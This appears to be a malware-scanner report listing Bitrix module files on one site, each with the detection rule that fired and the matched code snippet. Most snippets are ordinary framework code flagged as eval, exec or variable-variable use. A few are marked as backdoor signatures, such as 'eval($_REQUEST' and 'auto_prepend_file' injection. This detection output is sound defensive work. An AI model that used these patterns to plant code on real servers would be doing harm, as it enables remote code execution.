Sign 11413268 Line: 20 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/php_configuration.php Size: 5.02 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 25 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/admin/security_antivirus.php Size: 2.24 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit file_prepend Line: 13 Dangerous LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
php_value auto_prepend_file
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/lib/model/section.php Size: 1.02 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Line: 40 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($entity)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/classes/general/subelement.php Size: 50.47 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(\''.CUtil::JSEscape($this->onLoadScript).'\');'; echo '</script></body></html>'; } else { if($this->onLoadScript) echo '<script type="text/javascript">'.$this->onLoadScript.'</script>'; echo $string; } define("ADMIN_AJAX_MODE", true); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_after.php"); die(); } elseif ($_REQUEST["mode"]=='excel') { header("Content-Type: application/vnd.ms-excel"); header("Content-Disposition: filename=".basename($APPLICATION->GetCurPag...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_edit.php Size: 68.17 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 5
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_element_edit.php Size: 113.94 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 6
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_generator.php Size: 28.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(arFileProperties),
id = 0;
if(BX('ib_seg_max_property_id'))
{
id = BX('ib_seg_max_property_id').value;
if(id >= obPropertyTable.AR_FILE_PROPERTIES.length + 2)
{
return;
}
BX('ib_seg_max_property_id').value = Number(BX('ib_seg_max_property_id').value) + 1;
}
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';
var propertySpan = BX('ib_seg_property_span');
if(propertySpan)
{
var options = [];
for(var key in fileProperties)
{
if(fileProperties....
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.link.list/component.php Size: 1.14 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 19 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FN}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.filter/component.php Size: 32.43 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 61 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.smart.filter/component.php Size: 27.62 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 523 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/.default/template.php Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 1114 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
'BASKET_URL' => $arParams['BASKET_URL'],
'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
'USE_PRODUCT_QUANTITY' => 'N',
'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.sections.top/component.php Size: 19.13 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 180 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
// paste resp...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/rss.show/component.php Size: 2.52 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$val, $key', '$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT") array_walk_recursive($arResult, create_function('&$val, $key', '$val=str_replace(array(" ", "\\r\\n"), array(" ", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog/templates/.default/section.php Size: 2.44 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/subscribe/install/index.php Size: 8.65 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/socialservices/classes/general/authmanager.php Size: 42.92 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformfield.php Size: 22.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformstatus.php Size: 17.77 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cform_old.php Size: 9.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformvalidator.php Size: 7.56 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformresult.php Size: 67.99 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformanswer.php Size: 7.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cformresult_old.php Size: 7.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformoutput.php Size: 33.92 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->__cache_tpl.'<?'); $strReturn = ob_get_contents(); ob_end_clean(); return $strReturn; } else { return false; } } function IncludeFormTemplate() { global $APPLICATION; if ($this->__check_form_cache()) { $APPLICATION->SetTemplateCSS("form/form.css"); $FORM =& $this; eval($this->__cache_tpl); return true; } else { return false; } } function isStatisticIncluded() { return CModule::IncludeModule("statistic"); } function __check_form_cache() { global $CACHE_MANAGER; if (strlen($this->...
| Sign 11413268 Line: 100 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callform.php Size: 65.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit double_var2 Line: 522 Warning Double var technique is usually used for the obfuscation of malicious code |
${$var}
| Exploit double_var2 Line: 532 Warning Double var technique is usually used for the obfuscation of malicious code |
${$var2}
| Exploit execution Line: 11 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformvalidator.php Size: 368.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformfield.php Size: 413.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformanswer.php Size: 418.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformstatus.php Size: 5.58 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformoutput.php Size: 400.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformresult.php Size: 15.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cform.php Size: 6.01 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/options.php Size: 17.96 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(data.URL);
if (!res)
{
var proto = data.URL.match(/\.bitrix24\./) ? 'https' : 'http';
data.URL = proto + '://' + data.URL;
res = r.exec(data.URL);
}
if (res)
{
data.URL_SERVER = res[1]+'://'+res[2];
data.URL_PATH = res[3];
}
}
if (!data.AUTH_HASH)
{
var content = '<div class="form-crm-settings"><form name="form_'+popup_id+'"><table cellpadding="0" cellspacing="2" border="0"><tr><td align="right"><?=CUtil::JSEscape(GetMessage('FORM_TAB_CRM_ROW_TITLE'))?>:</...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/form/admin/form_field_edit.php Size: 31.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('function() {FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();}');
arInputs[i].onchange = new Function('FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();');
}
if (new_name == 'MESSAGE_' + (rows_count+1))
{
arInputs[i].onchange = jsFormValidatorSettings.UpdateAll;
}
}
var input1 = BX.create('INPUT', {
props: {
type: 'hidden',
name: 'ANSWER[]',
value: rows_count + 1
}
}),
input2 = BX.create('...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/highloadblock/lib/highloadblock.php Size: 17.42 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($eval); } $entity = $entity_data_class::getEntity(); $uFields = $USER_FIELD_MANAGER->getUserFields('HLBLOCK_'.$hlblock['ID']); foreach ($uFields as $uField) { if ($uField['MULTIPLE'] == 'N') { $params = array( 'required' => $uField['MANDATORY'] == 'Y' ); $field = $USER_FIELD_MANAGER->getEntityField($uField, $uField['FIELD_NAME'], $params); $entity->addField($field); foreach ($USER_FIELD_MANAGER->getEntityReferences($uField, $field) as $reference) { $entity->addField($reference); } } else { ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_db_server.php Size: 32.43 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/perfmon/admin/perfmon_row_edit.php Size: 17.01 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_LNUMBER || $tokens[$pos][0] === T_DNUMBER || $tokens[$pos][0] === T_CONSTANT_ENCAPSED_STRING) { $result = eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_ARRAY) { $pos++; while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITESPACE) $pos++; if ($tokens[$pos][0] !== "(") return; else $pos++; $result = array(); while (true) { while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITES...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/clouds/admin/clouds_file_list.php Size: 26.59 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 103 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/mobileapp/install/components/bitrix/mobileapp.menu/templates/.default/template.php Size: 12.57 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("showAuthForm");
}
}
<?endif;?>
if(BX.PULL)
{
BX.addCustomEvent("onPullExtendWatch", function(data) {
BX.PULL.extendWatch(data.id);
});
BX.addCustomEvent("thisPageWillDie", function(data) {
BX.PULL.clearWatch(data.page_id);
});
BX.addCustomEvent("onPullEvent", function (module_id, command, params)
{
if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
{
//app.onCustomEvent('onPullOnline', {...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_read_file.php Size: 3.33 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_list_files.php Size: 1.04 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog_user.php Size: 23.00 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $dbUserGroups = CBlogUserGroup::GetList( array(), array("ID" => $arGroups, "BLOG_ID" => $blogID), false, false, array("ID") ); $arGroups = array(); while ($arUserGroup = $dbUserGroups->Fetch()) $arGroups[] = IntVal($arUserGroup["ID"]); if ($action == BLOG_ADD) $arCurrentGroups = CBlogUser::GetUserGroups($ID, $blogID, "", $selectType); foreach($arGroups as $val) { if ($val != 1 && $val != 2) { if ($action == BLOG_CHANGE || $action == BLOG_ADD...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/general/blog.php Size: 62.20 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/index.php Size: 19.61 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/script.php Size: 26.06 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function eval Line: 140 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/template.php Size: 21.58 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/micro/template.php Size: 5.14 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.popular_blogs/component.php Size: 5.77 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i = 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog = CBlog::GetByID($blogID); $arBlog = CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php Size: 22.93 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function eval Line: 97 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php Size: 23.87 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php Size: 11.35 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php Size: 21.46 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.edit/.default/template.php Size: 25.44 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php Size: 21.68 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php Size: 15.83 kB Created: 2017-11-21 16:21:47 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
//...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/template.php Size: 33.53 kB Created: 2017-11-21 16:21:46 Modified: 2023-06-30 13:57:51 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/seo/admin/seo_tools.php Size: 39.90 kB Created: 2017-11-21 16:21:48 Modified: 2023-06-30 13:57:54 Dangers: 4
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list/templates/slider_big/template.php Size: 16.32 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Line: 338 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" + res[ii].href + "');};");
res[ii].parentNode.insertBefore(div, res[ii]);
res[ii].onmouseover = function()
{
this.previousSibling.onshow();
this.bxMouseOver = 'Y';
};
res[ii].onmouseout = function()
{
this.bxMouseOver = 'N';
var __this = this;
setTimeout(
function()
{
if (__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
{
__this.previousSibling...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 18.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php Size: 12.64 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 110 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*width*/
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php Size: 9.46 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var result = " + data + "; "); }
if (result['status'] == 'inprogress')
{
document.getElementById('photogallery_recalc').innerHTML = result['text'];
if (__this_source.bReady == false)
{
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
}
else
{
document.getElementById(...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 30.03 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/compression/include.php Size: 3.30 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/classes/general/editor_utils.php Size: 8.27 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($code); echo '#BX_RENDERED_COMPONENT#'; $s = ob_get_contents(); ob_end_clean(); return $s; } function _RenderAllComponents($arParams, $bLPA) { global $APPLICATION, $USER; $s = ''; $arPHP = PHPParser::ParseFile($arParams['source']); $l = count($arPHP); if ($l > 0) { $new_source = ''; $end = 0; $comp_count = 0; ob_start(); for ($n = 0; $n<$l; $n++) { $src = $arPHP[$n][2]; if (SubStr($src, 0, 5) == "<?"."php") $src = SubStr($src, 5); else $src = SubStr($src, 2); $src = SubStr($src, 0, -2); $co...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/options.php Size: 65.77 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/fileman.php Size: 71.53 kB Created: 2017-06-21 17:31:50 Modified: 2023-06-30 13:57:51 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_js.php Size: 1.58 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/fileman/admin/fileman_admin.php Size: 51.04 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:51 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 17 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/fileman_access.php")
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(fileowner($fnameConverted)); $arrFileGroup = posix_getgrgid(filegroup($fnameConverted)); $showField .= " ".$arrFileOwner['name']." ".$arrFileGroup['name']; } } else $showField = " "; } $row->AddField("PERMS", $showField); } $showField = ""; if (in_array("PERMS_B", $arVisibleColumns)) { $showField = " "; if(($USER->CanDoOperation('fileman_view_permissions') || $USER->CanDoOperation('fileman_edit_all_settings')) && $USER->CanDoFileOperation('fm_view_permission', $arPath)) ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/b24connector/install/components/bitrix/b24connector.button.list/ajax.php Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:51 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
